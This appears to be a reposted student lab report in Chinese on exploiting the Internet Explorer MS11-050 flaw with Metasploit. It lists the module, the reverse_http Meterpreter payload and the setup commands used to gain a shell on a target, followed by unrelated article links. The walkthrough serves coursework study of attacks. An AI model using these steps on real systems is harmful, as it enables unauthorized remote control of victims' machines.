博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
20145322 Exp5 MS11_050
阅读量:5256 次
发布时间:2019-06-14

本文共 407 字,大约阅读时间需要 1 分钟。

20145322 Exp5 MS11_050

实验过程

msfconsole命令进入控制台

使用命令search ms11_050查看针对MS11_050漏洞的攻击模块

885288-20170417092140384-56762305.jpg

使用命令 use exploit/windows/browser/ms11_050_mshtml_cobjectelement 进入模块,并使用info查看该模块的具体信息

885288-20170417092411759-1180888639.jpg

设置paylaods,我们选择了windows/meterpreter/reverse_http该payload会返回一个遵循http协议的shell,我们以此来获得目标主机系统权限。

使用命令set payloads windows/meterpreter/reverse_http

使用show options 查看具体参数设置

885288-20170417092534665-1677937809.jpg

设置其相关参数,攻击

885288-20170417094546540-1564116901.jpg

成功

885288-20170417094615009-61257345.jpg

转载于:https://www.cnblogs.com/HZW20145322/p/6721445.html

你可能感兴趣的文章
Factory Design Pattern
查看>>
P1192-台阶问题
查看>>
一、使用pip安装Python包
查看>>
3.PHP 教程_PHP 语法
查看>>
Duilib扩展《01》— 双击、右键消息扩展
查看>>
利用Fiddler拦截接口请求并篡改数据
查看>>
python习题:unittest参数化-数据从文件或excel中读取
查看>>
在工程中要加入新的错误弹出方法
查看>>
PS 滤镜— — sparkle 效果
查看>>
网站产品设计
查看>>
代理ARP
查看>>
go 学习笔记(4) ---项目结构
查看>>
java中静态代码块的用法 static用法详解
查看>>
Java线程面试题
查看>>
Paper Reading: Relation Networks for Object Detection
查看>>
day22 01 初识面向对象----简单的人狗大战小游戏
查看>>
mybatis源代码分析:深入了解mybatis延迟加载机制
查看>>
Flask三剑客
查看>>
Hibernate-缓存
查看>>
【BZOJ4516】生成魔咒(后缀自动机)
查看>>